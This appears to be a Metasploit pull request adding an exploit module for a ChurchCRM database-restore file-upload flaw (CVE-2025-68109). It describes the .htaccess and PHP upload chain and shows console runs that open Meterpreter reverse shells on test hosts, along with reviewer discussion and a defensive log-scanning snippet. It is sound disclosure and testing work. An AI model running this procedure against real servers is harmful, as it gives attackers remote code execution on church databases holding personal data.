
Adds exploit module for ChurchCRM authenticated RCE (CVE-2025-68109)#21095

Merged
bwatters-r7 merged 12 commits into rapid7:master from LucasCsmt:multi/http/churchcrm_db_restore_rce
Apr 15, 2026

Conversation

@LucasCsmt
Contributor

@LucasCsmt LucasCsmt commented Mar 11, 2026

This PR adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. This module will work on version 6.2.0 of ChurchCRM and earlier.

The vulnerability exists within the database restore functionality. Due to a lack of input validation, an attacker can inject arbitrary files. Using this vulnerability in order to upload a .htaccess file, an attacker will be able to upload an accessible PHP file that will be interpreted. This Metasploit module exploits the vulnerability in order to upload a payload.

Module Details

  • Module Path: modules/exploits/multi/http/churchcrm_db_restore_rce.rb
  • Documentation: documentation/modules/exploits/multi/http/churchcrm_db_restore_rce.md
  • Targets:
    • Linux (Dropper)
    • PHP (In-Memory)
    • PHP (Fetch)
  • Vulnerability Type: Authenticated RCE (PHP Injection)

Verification

  • Start the vulnerable environment (using Docker instructions provided in the documentation for example).
  • Start msfconsole
  • use exploit/multi/http/churchcrm_db_restore_rce
  • set RHOSTS <TARGET_IP>
  • set LHOST <YOUR_IP>
  • set target 0 for Linux system
  • set target 1 for PHP (In-Memory)
  • set target 2 for PHP (Fetch)
  • set payload <PAYLOAD>
  • set PASSWORD <PASSWORD>
  • set USERNAME <USERNAME>
  • check
  • run
  • Verify that a Meterpreter session is successfully opened
  • Verify that command execution is possible (id, shell, ...).
  • Verify cleanup: check that no temporary payloads remain in /tmp or in /var/www/html/churchcrm/tmp_attach/ChurchCRMBackups.

Scenario

msf > use exploit/multi/http/churchcrm_db_restore_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set target 0
target => 0
msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
PASSWORD => Password123!
msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME 'admin'
USERNAME => admin
msf exploit(multi/http/churchcrm_db_restore_rce) > show info

       Name: ChurchCRM Database Restore RCE 6.2.0
     Module: exploit/multi/http/churchcrm_db_restore_rce
   Platform: Linux, PHP
       Arch: x86, x64, php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2025-12-17

Provided by:
  LucasCsmt

Module side effects:
 ioc-in-logs
 config-changes

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Linux/unix Command (CmdStager)
      1   PHP (In-Memory)
      2   PHP (Fetch)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   Password123!     yes       Password for the admin account
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
  RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SRVSSL     false            no        Negotiate SSL/TLS for local server connections
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME   admin            yes       Username for the admin account
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on a
                                      ll addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  This module exploits a Remote Code Execution (RCE) vulnerability in ChurchCRM
  versions prior to 6.2.0. The vulnerability resides in the Database Restore
  functionality, which allows an authenticated user with administrative privileges
  to upload a malicious backup file. By bypassing upload restrictions via a
  crafted .htaccess file, the module enables PHP code execution in the target
  directory, ultimately providing the attacker with a Meterpreter shell.

References:
  https://github.com/advisories/GHSA-pqm7-g8px-9r77
  https://nvd.nist.gov/vuln/detail/CVE-2025-68109


View the full module info with the info -d command.

msf exploit(multi/http/churchcrm_db_restore_rce) > check
[*] Found ChurchCRM version: 6.2.0
[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.2.0 detected via CRM-VERSION header.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : RnYEwCkhr.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Command Stager progress -  59.76% done (499/835 bytes)
[*] Sending stage (3090404 bytes) to 172.18.0.2
[+] Deleted .htaccess
[+] Deleted RnYEwCkhr.php
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:55742) at 2026-03-11 09:26:27 +0100
[*] Command Stager progress - 100.00% done (835/835 bytes)
[+] Payload successfully executed
meterpreter >
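Two defender-side checks that follow from what the module reports above, added here as example code (not the module's code and not part of the PR): a version test on the CRM-VERSION header the check method relies on, and a scan of Apache access-log lines for requests to .php or .htaccess files under the ChurchCRMBackups directory the chain writes into. The web path mirroring the filesystem path under tmp_attach/ and the combined log format are assumptions; the log lines are constructed samples.

```ruby
require 'rubygems'

# Per the PR description, 6.2.0 and every earlier release are affected.
LAST_VULNERABLE = Gem::Version.new('6.2.0')

# Returns true when a CRM-VERSION header value denotes an affected release.
# Malformed or absent headers are treated as "not confirmed", never as safe.
def vulnerable_version?(crm_version_header)
  return false if crm_version_header.nil?
  m = crm_version_header.strip.match(/\A\d+(\.\d+)*\z/)
  return false unless m
  Gem::Version.new(m[0]) <= LAST_VULNERABLE
end

# The exploit drops a .htaccess and a random-named .php file into the backup
# directory and then requests the .php file over HTTP. Any request for such a
# file under that path is an indicator worth alerting on. (Web path assumed.)
BACKUP_PATH = %r{/tmp_attach/ChurchCRMBackups/[^\s?]*\.(php|htaccess)\b}i

# Parses Apache combined-log lines and returns the matching requests.
def suspicious_backup_requests(log_lines)
  log_lines.each_with_object([]) do |line, hits|
    m = line.match(%r{"(?<method>[A-Z]+) (?<path>\S+) HTTP/[\d.]+" (?<status>\d{3})})
    next unless m && BACKUP_PATH.match?(m[:path])
    hits << { method: m[:method], path: m[:path], status: m[:status].to_i }
  end
end

# Constructed sample log: one benign request, one hit matching the filename
# seen in the module output above, one benign image fetch.
SAMPLE_LOG = [
  '10.0.0.5 - - [11/Mar/2026:09:26:20 +0100] "GET /churchcrm/ HTTP/1.1" 200 4120',
  '10.0.0.5 - - [11/Mar/2026:09:26:26 +0100] "GET /churchcrm/tmp_attach/ChurchCRMBackups/RnYEwCkhr.php HTTP/1.1" 200 12',
  '10.0.0.7 - - [11/Mar/2026:09:27:01 +0100] "GET /churchcrm/Images/logo.png HTTP/1.1" 200 9001'
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "6.2.0 affected: #{vulnerable_version?('6.2.0')}"
  suspicious_backup_requests(SAMPLE_LOG).each { |h| puts "ALERT #{h[:method]} #{h[:path]} -> #{h[:status]}" }
end
```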


LucasCsmt added 11 commits March 2, 2026 10:47
This commit contains the initialisation of the module file including a
description, all the targets and options that this module will need.
I added a check function that checks if the server is accessible and
vulnerable. I also added a build_payload function that builds the PHP
file that will be executed by the vulnerable host.

Copilot AI left a comment


Copilot reviewed 2 out of 2 changed files in this pull request and generated no comments.

@bwatters-r7 bwatters-r7 self-assigned this Mar 26, 2026
'Platform' => ['linux', 'php'],
'Targets' => [
  [
    'Linux/unix Command (CmdStager)',
Contributor


I'm curious why CmdStager is used here?
CmdStager is useful if you don't have access to curl/wget, but if you do have access to curl/wget, fetch payloads are significantly simpler.

Contributor Author


I went with CmdStager for compatibility concerns, aiming to make the module more flexible regardless of the available binaries on the target.

Comment thread documentation/modules/exploit/multi/http/churchcrm_db_restore_rce.md Outdated
@bwatters-r7

msf exploit(multi/http/churchcrm_db_restore_rce) > show options

Module options (exploit/multi/http/churchcrm_db_restore_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password for the admin account
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, sapni, http, socks4
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVSSL     false            no        Negotiate SSL/TLS for local server connections
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username for the admin account
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux/unix Command (CmdStager)



View the full module info with the info, or info -d command.

msf exploit(multi/http/churchcrm_db_restore_rce) > set verbose true
verbose => true
msf exploit(multi/http/churchcrm_db_restore_rce) > set rhost 10.5.134.167
rhost => 10.5.134.167
msf exploit(multi/http/churchcrm_db_restore_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[-] Msf::OptionValidateError One or more options failed to validate: PASSWORD.
msf exploit(multi/http/churchcrm_db_restore_rce) > set password v3Mpassword
password => v3Mpassword
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Getting the session cookie
[-] The connection was refused by the remote host (10.5.134.167:80).
[-] Exploit aborted due to failure: unreachable: No answer from the server
[*] Exploit completed, but no session was created.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : QCiwIOFO.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Command Stager progress -  59.74% done (500/837 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 10.5.134.167
[+] Deleted .htaccess
[+] Deleted QCiwIOFO.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.167:38250) at 2026-04-09 17:53:14 -0500

[*] Command Stager progress - 100.00% done (837/837 bytes)
[+] Payload successfully executed

meterpreter > 
meterpreter > sysinfo
Computer     : 8e1fe9f8dbe9
OS           : Ubuntu 22.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data

…rce.md

Co-authored-by: Brendan <bwatters@rapid7.com>
@bwatters-r7

Release Notes

Adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. This module will work on version 6.2.0 of ChurchCRM and earlier.

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Apr 15, 2026
@bwatters-r7 bwatters-r7 merged commit c17c301 into rapid7:master Apr 15, 2026
18 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Apr 15, 2026
@jheysel-r7 jheysel-r7 added module rn-modules release notes for new or majorly enhanced modules docs labels Apr 17, 2026